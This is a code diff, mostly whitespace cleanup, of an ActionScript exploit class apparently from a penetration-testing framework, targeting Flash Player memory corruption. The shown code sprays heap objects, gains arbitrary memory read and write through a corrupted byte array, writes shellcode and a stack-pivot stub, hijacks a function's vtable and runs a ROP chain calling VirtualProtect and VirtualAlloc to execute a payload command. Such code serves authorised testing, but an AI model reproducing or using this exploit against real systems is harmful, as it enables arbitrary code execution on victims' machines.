@@ -17,18 +17,18 @@ package
1717 private var stack_object: uint
1818 private var payload_space_object: uint
1919 private var buffer_object: uint
20- private var magic: uint
21- private var magic_arg0: uint
22- private var magic_arg1: uint
23- private var magic_object: uint
24- private var magic_table: uint
20+ private var magic: uint
21+ private var magic_arg0: uint
22+ private var magic_arg1: uint
23+ private var magic_object: uint
24+ private var magic_table: uint
2525 private var buffer: uint
2626 private var vtable: uint
2727 private var stack_address: uint
2828 private var payload_address: uint
29- private var stub_address: uint
30- private var stub_space_object: uint
31- private var stub: Vector .< uint > = new Vector .< uint > (8 )
29+ private var stub_address: uint
30+ private var stub_space_object: uint
31+ private var stub: Vector .< uint > = new Vector .< uint > (8 )
3232 private var stack: Vector .< uint > = new Vector .< uint > (0x6400 )
3333 private var payload_space: Vector .< uint > = new Vector .< uint > (0x6400 )
3434 private var spray: Vector .< Object > = new Vector .< Object > (90000 )
@@ -55,17 +55,17 @@ package
5555 cleanup()
5656 }
5757
58- static function Magic (... a){}
58+ static function Magic (... a){}
5959
6060 private function spray_objects ():void
6161 {
6262 Logger. log ("[*] Exploiter - spray_objects()" )
6363
64- // mov eax,[esp+0x4]
65- // xchg eax,esp
66- // rets
67- stub[ 0 ] = 0x0424448B
68- stub[ 1 ] = 0x0000C394
64+ // mov eax,[esp+0x4]
65+ // xchg eax,esp
66+ // rets
67+ stub[ 0 ] = 0x0424448B
68+ stub[ 1 ] = 0x0000C394
6969
7070 for (var i: uint = 0 ; i < spray. length ; i++ )
7171 {
@@ -74,8 +74,8 @@ package
7474 spray[ i][ 1 ] = exploit
7575 spray[ i][ 2 ] = stack
7676 spray[ i][ 3 ] = payload_space
77- spray[ i][ 4 ] = Magic
78- spray[ i][ 5 ] = stub
77+ spray[ i][ 4 ] = Magic
78+ spray[ i][ 5 ] = stub
7979 }
8080 }
8181
@@ -93,9 +93,8 @@ package
9393 main = ev. at(pos + 1 ) - 1
9494 stack_object = ev. at(pos + 2 ) - 1
9595 payload_space_object = ev. at(pos + 3 ) - 1
96- magic = ev. at(pos + 4 ) - 1
97- Logger. log ('magic: 0x' + magic. toString (16 ))
98- stub_space_object = ev. at(pos + 5 ) - 1
96+ magic = ev. at(pos + 4 ) - 1
97+ stub_space_object = ev. at(pos + 5 ) - 1
9998 if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000 ) {
10099 return false
101100 }
@@ -118,12 +117,11 @@ package
118117 vtable = ev. read(main)
119118 stack_address = ev. read(stack_object + 0x18 )
120119 payload_address = ev. read(payload_space_object + 0x18 )
121- stub_address = ev. read(stub_space_object + 0x18 )
122- magic_object = ev. read(ev. read(ev. read(ev. read(magic + 8 ) + 0x14 ) + 4 ) + 0xb0 )
123- magic_table = ev. read(magic_object)
124-
125- magic_arg0 = ev. read(magic + 0x1c )
126- magic_arg1 = ev. read(magic + 0x20 )
120+ stub_address = ev. read(stub_space_object + 0x18 )
121+ magic_object = ev. read(ev. read(ev. read(ev. read(magic + 8 ) + 0x14 ) + 4 ) + 0xb0 )
122+ magic_table = ev. read(magic_object)
123+ magic_arg0 = ev. read(magic + 0x1c )
124+ magic_arg1 = ev. read(magic + 0x20 )
127125 }
128126
129127 private function corrupt_byte_array ():void
@@ -190,15 +188,15 @@ package
190188 eba. write(buffer + 0x10 , "\x b8" , false ); eba. write(0 , magic_table, false ) // mov eax, vtable
191189 eba. write(0 , "\x bb" , false ); eba. write(0 , magic_object, false ) // mov ebx, main
192190 eba. write(0 , "\x 89\x 03" , false ) // mov [ebx], eax
193- eba. write(0 , "\x 87\x f4\x c2\x 10\x 00" , false ) // xchg esi, esp # ret 0x10
191+ eba. write(0 , "\x 87\x f4\x c2\x 10\x 00" , false ) // xchg esi, esp # ret 0x10
194192
195193 // Put the payload (command) in memory
196194 eba. write(payload_address + 8 , payload, true ); // payload
197195
198196 // Put the fake stack on memory
199197 eba. write(stack_address + 0x18000 , xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
200198
201- eba. write(0 , virtualprotect)
199+ eba. write(0 , virtualprotect)
202200
203201 // VirtualProtect
204202 eba. write(0 , virtualalloc)
@@ -230,26 +228,26 @@ package
230228 eba. write(0 , 0 )
231229 eba. write(0 , 0 )
232230
233- for (var i: uint ; i < 0x100 ; i++ ) {
234- eba. write(stack_address + 8 + (i * 4 ), eba. read(magic_table - 0x80 + i * 4 ))
235- }
236-
237- // VirtualProtect the stub with a *reliable* stackpivot
238- eba. write(stack_address + 8 + 0x80 + 28 , virtualprotect)
239- eba. write(magic_object, stack_address + 8 + 0x80 ); // overwrite vtable (needs to be restored)
240- eba. write(magic + 0x1c , stub_address)
241- eba. write(magic + 0x20 , 0x10 )
242- var args : Array = new Array (0x41 )
243- Magic. call . apply (null , args );
244-
245- // Call to our stackpivot and init the rop chain
246- eba. write(stack_address + 8 + 0x80 + 28 , stub_address + 8 )
247- eba. write(magic_object, stack_address + 8 + 0x80 ); // overwrite vtable (needs to be restored)
248- eba. write(magic + 0x1c , stack_address + 0x18000 )
249- Magic. call . apply (null , null );
250- eba. write(magic_object, magic_table);
251- eba. write(magic + 0x1c , magic_arg0)
252- eba. write(magic + 0x20 , magic_arg1)
231+ for (var i: uint ; i < 0x100 ; i++ ) {
232+ eba. write(stack_address + 8 + (i * 4 ), eba. read(magic_table - 0x80 + i * 4 ))
233+ }
234+
235+ // VirtualProtect the stub with a *reliable* stackpivot
236+ eba. write(stack_address + 8 + 0x80 + 28 , virtualprotect)
237+ eba. write(magic_object, stack_address + 8 + 0x80 ); // overwrite vtable (needs to be restored)
238+ eba. write(magic + 0x1c , stub_address)
239+ eba. write(magic + 0x20 , 0x10 )
240+ var args : Array = new Array (0x41 )
241+ Magic. call . apply (null , args );
242+
243+ // Call to our stackpivot and init the rop chain
244+ eba. write(stack_address + 8 + 0x80 + 28 , stub_address + 8 )
245+ eba. write(magic_object, stack_address + 8 + 0x80 ); // overwrite vtable (needs to be restored)
246+ eba. write(magic + 0x1c , stack_address + 0x18000 )
247+ Magic. call . apply (null , null );
248+ eba. write(magic_object, magic_table);
249+ eba. write(magic + 0x1c , magic_arg0)
250+ eba. write(magic + 0x20 , magic_arg1)
253251 }
254252
255253 private function do_rop_linux ():void
0 commit comments